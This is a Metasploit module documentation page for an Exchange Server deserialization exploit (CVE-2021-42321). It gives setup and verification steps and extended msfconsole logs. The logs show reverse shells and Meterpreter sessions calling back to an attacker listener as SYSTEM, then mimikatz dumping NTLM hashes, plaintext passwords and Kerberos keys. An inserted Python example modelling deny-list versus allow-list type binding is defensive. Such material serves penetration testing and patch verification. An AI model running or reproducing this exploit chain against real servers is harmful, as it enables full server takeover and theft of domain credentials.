Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE - Metasploit
This page contains detailed information about how to use the exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Verification Steps
- Targets
- Options
- Scenarios
- Exchange Server 2016 CU22 SU0 On Windows Server 2016
- Target 0 - Windows Command
- Target 1 - Windows Dropper
- Target 2 - PowerShell Stager
- Exchange Server 2019 CU11 SU0 on Windows Server 2019 Fully Updated with February 2022 Patches
- Target 0 - Windows Command
- Target 1 - Windows Dropper
- Target 2 - PowerShell Stager
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE
Module: exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
Source code: modules/exploits/windows/http/exchange_chainedserializationbinder_denylist_typo_rce.rb
Disclosure date: 2021-12-09
Last modification time: 2022-03-17 09:56:51 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-42321
This vulnerability allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2. Note that authentication is required to exploit this vulnerability. The specific flaw exists because the deny list for the ChainedSerializationBinder contained a typo: an entry was mistyped as System.Security.ClaimsPrincipal instead of the correct value System.Security.Claims.ClaimsPrincipal. By leveraging this vulnerability, attackers can bypass the ChainedSerializationBinder's deserialization deny list and execute code as NT AUTHORITY\SYSTEM. Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
msf exploit(exchange_chainedserializationbinder_denylist_typo_rce) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Description
This vulnerability allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2.
Note that authentication is required to exploit this vulnerability.
The specific flaw exists because the deny list for the ChainedSerializationBinder contained a typo: an entry was mistyped as System.Security.ClaimsPrincipal instead of the correct value System.Security.Claims.ClaimsPrincipal. By leveraging this vulnerability, attackers can bypass the ChainedSerializationBinder's deserialization deny list and execute code as NT AUTHORITY\SYSTEM.
Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
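The typo the description above turns on is a general failure mode of deny-list type binding: a mistyped entry can never equal a real type name, so it blocks nothing, and nothing in normal operation reveals that. The Python model below is added here and is not code from the Metasploit module or from Exchange. It models the binder's type-resolution decision with plain strings and shows three things: the mistyped entry letting the real type through while the corrected entry blocks it, an allow-list binder that fails closed instead, and a lint that catches dead deny-list entries by checking them against a catalogue of type names that actually exist. The only values taken from the page are the two ClaimsPrincipal type names; the Contoso type names, the KNOWN_TYPES catalogue and all function names are constructed for illustration.

```python
"""Deny-list vs allow-list type binding, modelled in Python.

Constructed example: models, with plain strings, the decision a .NET
SerializationBinder makes when a serialized stream names a type. The only
values taken from the page are TYPO_ENTRY and CORRECT_ENTRY; every other type
name, list and function here is illustrative.
"""
from __future__ import annotations

# The two names the description quotes: the deny-list entry as shipped (one
# namespace segment missing) and the type name a serialized object actually carries.
TYPO_ENTRY = "System.Security.ClaimsPrincipal"
CORRECT_ENTRY = "System.Security.Claims.ClaimsPrincipal"

# A small deny list as shipped with the typo (the Contoso entry is hypothetical).
DENY_LIST_WITH_TYPO = frozenset({TYPO_ENTRY, "Contoso.Legacy.UnsafeLoader"})

# The same list after correcting the mistyped entry.
DENY_LIST_FIXED = frozenset((DENY_LIST_WITH_TYPO - {TYPO_ENTRY}) | {CORRECT_ENTRY})

# An allow list: only the types the application itself expects to deserialize (hypothetical).
ALLOW_LIST = frozenset({"Contoso.Mail.UserConfiguration", "System.String", "System.Int32"})

# Catalogue of type names that exist in the loaded assemblies; a constructed
# stand-in for what reflecting over the real assemblies would return.
KNOWN_TYPES = frozenset({
    CORRECT_ENTRY,
    "Contoso.Legacy.UnsafeLoader",
    "Contoso.Mail.UserConfiguration",
    "System.String",
    "System.Int32",
})


class BindError(Exception):
    """Raised when the binder refuses to resolve a type name."""


def deny_list_bind(type_name: str, deny_list: frozenset[str]) -> str:
    """Deny-list binder: refuse listed names, resolve everything else.

    An entry spelled wrong never equals a real type name, so it silently
    blocks nothing; that is exactly the failure the typo caused.
    """
    if type_name in deny_list:
        raise BindError(f"type {type_name!r} is on the deny list")
    return type_name


def allow_list_bind(type_name: str, allow_list: frozenset[str]) -> str:
    """Allow-list binder: resolve only names the application expects.

    A typo here fails closed: a mistyped allow-list entry breaks the
    legitimate type and shows up in testing, rather than admitting
    attacker-chosen types.
    """
    if type_name not in allow_list:
        raise BindError(f"type {type_name!r} is not on the allow list")
    return type_name


def outcome(binder, type_name: str, type_list: frozenset[str]) -> str:
    """Run a binder and report 'resolved' or 'blocked' instead of raising."""
    try:
        binder(type_name, type_list)
    except BindError:
        return "blocked"
    return "resolved"


def dead_deny_list_entries(deny_list: frozenset[str], known_types: frozenset[str]) -> list[str]:
    """Lint for deny lists: entries that name no real type can never match.

    Run in a unit test against the type catalogue, this flags a mistyped
    entry such as the ClaimsPrincipal one before it ships.
    """
    return sorted(entry for entry in deny_list if entry not in known_types)


if __name__ == "__main__":
    for label, deny_list in (("with typo", DENY_LIST_WITH_TYPO), ("fixed", DENY_LIST_FIXED)):
        print(f"deny list {label}: {CORRECT_ENTRY} -> {outcome(deny_list_bind, CORRECT_ENTRY, deny_list)}")
    print(f"allow list: {CORRECT_ENTRY} -> {outcome(allow_list_bind, CORRECT_ENTRY, ALLOW_LIST)}")
    print("dead deny-list entries:", dead_deny_list_entries(DENY_LIST_WITH_TYPO, KNOWN_TYPES))
```

The practical takeaway for anyone maintaining a binder is the last function: a deny list is only as good as the spelling of each entry, and the one check that catches this class of bug is asserting that every entry resolves to a type that actually exists.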
Setup
- Set up a version of Windows Server 2019.
- Download Exchange Server 2019 CU11 SU0 from https://download.microsoft.com/download/5/3/e/53e75dbd-ca33-496a-bd23-1d861feaa02a/ExchangeServer2019-x64-CU11.ISO
- Follow the guide at https://petri.com/how-to-install-active-directory-in-windows-server-2019-server-manager to turn the server into an AD server.
- Mount the ISO and run Setup.exe. It should prompt you to install .NET Framework, Visual Studio C++ Redistributables, and Unified Communications Managed API. Install these and then reboot.
- Follow https://www.nucleustechnologies.com/blog/step-by-step-guide-to-install-exchange-server-2019-part-1/ and install the required features.
- Keep running Setup.exe and installing extra dependencies as needed as per the links.
- When you do get all dependencies installed, Exchange should show a button called Install which should no longer be greyed out. Press this to install and accept any warnings that appear.
- Go to https://<ip here>/owa/ and make sure you can see the Exchange Outlook login page.
Verification Steps
- Follow Setup to set up a vulnerable target.
- Start msfconsole
- set RHOST <target IP address>
- set LHOST <IP for target to connect back to>
- set HttpUsername <username of OWA user to log in as>
- set HttpPassword <password for this OWA user>
- Optional: set DOMAIN <domain of OWA user>
- Optional: set VHOST <vhost of target>
- exploit
- You should get a shell on the target as NT AUTHORITY\SYSTEM if it is vulnerable.
Targets
- 0: Windows Command
- 1: Windows Dropper
- 2: PowerShell Stager
Options
- HttpUsername: Set this to the OWA username. This can also be set to a valid domain username that has permissions to log into Exchange.
- HttpPassword: Set this to the OWA password. This can also be set to the password for a domain user that has permissions to log into Exchange.
Scenarios
Exchange Server 2016 CU22 SU0 On Windows Server 2016
Target 0 - Windows Command
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.24.104.104 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.24.97.166 yes The listen address (an interface may be speci
fied)
LOAD_MODULES no A list of powershell modules separated by a c
omma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started reverse TCP handler on 172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs7u
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Powershell session session 1 opened (172.24.97.166:4444 -> 172.24.104.104:8404 ) at 2022-02-22 17:27:02 -0600
PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv>
Target 1 - Windows Dropper
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 1
target => 1
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.24.104.104 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proc
ess, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 172.24.97.166 yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
1 Windows Dropper
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Using URL: http://0.0.0.0:8080/7nZtWqPZw3Oz
[*] Local IP: http://172.24.97.166:8080/7nZtWqPZw3Oz
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs72
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Command Stager progress - 100.00% done (151/151 bytes)
[*] Client 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576) requested /7nZtWqPZw3Oz
[*] Sending payload to 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576)
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Redirecting stageless connection from /886ARUzXt2EUshWwdqdmVAWJyxlofzHG with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15'
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Attaching orphaned/stageless session...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:34:07 -0600
[*] Server stopped.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator TESTINGDOMAIN2 373b765d01cd8aefe 220cface685ef2b97 968811261fcbaff0d
a318e3843980454 a998f965b0d9b996b 2d5c4c8e546ba87
55d560
EXCHG-2016$ TESTINGDOMAIN2 f03d9a521cfd7eed6 ab32f2765ba2a3a3c
51c0ce1b0298d82 914aa472be639b241
21e69c
HealthMailbox2e9 TESTINGDOMAIN2 c1ab4c2b030aa3759 363c5d7a09080cd07 4e9729bc7336ca551
0d89 a4790cf6c78c642 d85c7ebacafd4ccb4 0624e08feaef9eb
70c944
ssp credentials
===============
Username Domain Password
-------- ------ --------
HealthMailbox2e90d89fe61a419 (null) LWjz0zSYg$YiYf2r{e-24zpAr)[email protected])Iq)h!49{6w(i_/_-3^%{
ba6c0942480b9c30e@testingdom K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
ain.internal G81r@gX$q9RGGFa7s@$B3IdYxz
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN2 (null)
EXCHG-2016$ TESTINGDOMAIN2 (null)
HealthMailbox2e90d89 TESTINGDOMAIN2 (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN.INTERNAL (null)
EXCHG-2016$ testingdomain.internal ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
7 f3 0c 27 df 31 5d 33 e3 32 e9
HealthMailbox2e90d89 TESTINGDOMAIN.INTERNAL (null)
exchg-2016$ TESTINGDOMAIN.INTERNAL (null)
meterpreter >
Target 2 - PowerShell Stager
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.24.104.104 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proces
s, none)
LHOST 172.24.97.166 yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
2 PowerShell Stager
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs76
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Staging x64 payload (201308 bytes) ...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:37:56 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator TESTINGDOMAIN2 373b765d01cd8aefe 220cface685ef2b97 968811261fcbaff0d
a318e3843980454 a998f965b0d9b996b 2d5c4c8e546ba87
55d560
EXCHG-2016$ TESTINGDOMAIN2 f03d9a521cfd7eed6 ab32f2765ba2a3a3c
51c0ce1b0298d82 914aa472be639b241
21e69c
HealthMailbox2e9 TESTINGDOMAIN2 c1ab4c2b030aa3759 363c5d7a09080cd07 4e9729bc7336ca551
0d89 a4790cf6c78c642 d85c7ebacafd4ccb4 0624e08feaef9eb
70c944
ssp credentials
===============
Username Domain Password
-------- ------ --------
HealthMailbox2e90d89fe61a419 (null) LWjz0zSYg$YiYf2r{e-24zpAr)[email protected])Iq)h!49{6w(i_/_-3^%{
ba6c0942480b9c30e@testingdom K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
ain.internal G81r@gX$q9RGGFa7s@$B3IdYxz
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN2 (null)
EXCHG-2016$ TESTINGDOMAIN2 (null)
HealthMailbox2e90d89 TESTINGDOMAIN2 (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN.INTERNAL (null)
EXCHG-2016$ testingdomain.internal ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
7 f3 0c 27 df 31 5d 33 e3 32 e9
HealthMailbox2e90d89 TESTINGDOMAIN.INTERNAL (null)
exchg-2016$ TESTINGDOMAIN.INTERNAL (null)
meterpreter >
Exchange Server 2019 CU11 SU0 on Windows Server 2019 Fully Updated with February 2022 Patches
Target 0 - Windows Command
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.31.160.218 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.31.171.42 yes The listen address (an interface may be speci
fied)
LOAD_MODULES no A list of powershell modules separated by a c
omma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started reverse TCP handler on 172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7f
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Powershell session session 1 opened (172.31.171.42:4444 -> 172.31.160.218:30212 ) at 2022-02-14 18:01:56 -0600
PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv> exit
[*] 172.31.160.218 - Powershell session session 1 closed. Reason: User exit
Target 1 - Windows Dropper
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
